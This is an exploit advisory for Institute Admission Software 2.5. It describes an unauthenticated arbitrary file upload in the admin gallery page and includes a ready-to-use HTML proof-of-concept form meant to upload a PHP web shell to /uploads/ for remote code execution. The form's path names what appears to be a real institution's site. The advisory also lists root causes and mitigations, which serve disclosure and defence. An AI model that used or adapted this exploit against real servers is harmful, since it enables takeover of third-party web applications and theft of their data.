=============================================================================================================================================
| # Title     : Institute Admission Software 2.5 Remote File Upload Vulnerability                                                           |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits)                                                            |
| # Vendor    : https://softmaart.com/institute-admission-software.php                                                                      |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] summary  : This vulnerability affects Institute Admission Software v2.5, where the application fails to properly validate and restrict uploaded files in the gallery upload functionality within the admin panel.
               An attacker can exploit this weakness by directly submitting a crafted multipart/form-data POST request to the vulnerable endpoint, allowing the upload of arbitrary executable files instead of legitimate images.
               Due to the absence of strict server-side file type validation, content inspection, and execution controls, 
			   a malicious file (e.g. PHP web shell or executable payload) can be successfully uploaded to the publicly accessible /uploads/ directory.
               Once uploaded, the attacker may directly access the file via the browser, potentially leading to Remote Code Execution (RCE) on the target server.

[+] Impact includes:

Arbitrary file upload

Remote command execution

Full web application compromise

Possible server takeover depending on permissions

[+] Root Cause:

Missing MIME-type and extension validation

No server-side file execution restrictions

Insecure upload directory exposure

[+] Severity: High

Attack Vector: Remote / Unauthenticated (depending on admin access exposure)

This issue highlights a critical failure in secure file handling practices and emphasizes the necessity of enforcing strict upload validation, randomized file naming, execution blocking, and proper access controls.

[+] The following html code uploads a executable malicious file remotely .

[+] Save code As : poc.html

[+] Line 01 set your Target

[+] Link to the uploaded files :/uoploads/

[+] use payload : 
	
<form action="http://127.0.0.1/gpgcgairsain.ac.in/admin_panel/gallery.php?id=19" method="POST" enctype="multipart/form-data">
  <label for="event">Event:</label>
  <select name="event" id="event">
    <option value="19">Hindi Departmental Programme</option>
    <!-- يمكنك إضافة خيارات الأحداث هنا -->
  </select>
  <br><br>

  <label for="photo">Photo:</label>
  <input type="file" name="photo" id="photo" accept="image/*">
  <br><br>

  <input type="hidden" name="db_photo" value="">

  <input type="submit" name="submit" value="Upload">
</form>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================